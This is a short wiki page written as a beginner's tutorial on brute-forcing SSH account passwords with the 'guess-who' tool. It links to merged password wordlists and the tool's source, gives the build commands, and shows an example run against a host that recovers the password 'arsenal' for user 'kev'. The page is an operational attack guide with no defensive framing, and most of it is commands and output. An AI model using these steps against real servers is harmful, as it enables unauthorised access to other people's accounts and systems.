#format wiki #language en == Brute Force ssh (for n00bs) == Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. <
> It is available from http://packetstormsecurity.org/ <
> === Required Files and programs === It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' <
> * Choose ''' 1 ''' from the following: <
> || [[http://www.ac3bf1.org/files/sec/all_merged.tar.gz|all_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/all_merged.zip|all_merged.zip]] || ('''~20MB!''' - 67MB uncompressed) || - Several passwords || || [[http://www.ac3bf1.org/files/sec/common_merged.tar.gz|common_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/common_merged.zip|common_merged.zip]] || (~6.5MB - 18MB uncompressed) || - Selection of common passwords || <
> * Required Program: <
> [[http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz|guess-who-0.44.tgz]] (16.1 KB) - Linux program to Brute Force SSH <
> * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files <
> [[http://www.ac3bf1.org/files/sec/uumerge.zip|uumerge.zip]] (55.1 KB) Wind0ws merging program <
> * The following are to be chosen if you want to create personalized password files. [[http://www.ac3bf1.org/files/sec/common.tar.gz|common.tar.gz]] | [[http://www.ac3bf1.org/files/sec/common.zip|common.zip]] (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)''' <
> [[http://www.ac3bf1.org/files/sec/all.tar.gz|all.tar.gz]] | [[http://www.ac3bf1.org/files/sec/all.zip|all.zip]] (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' <
> === Procedure === Installation: <
> Download to the desired directory <
> {{{ tar -zxvf guess-who-0.44.tgz make }}} <
> Execution: <
> {{{ [root@hacker guess-who]# ./b guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries] Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file }}} Expected output: <
> {{{ [root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt (!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ] [ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ] }}} As you can see the user kev has a password of arsenal <
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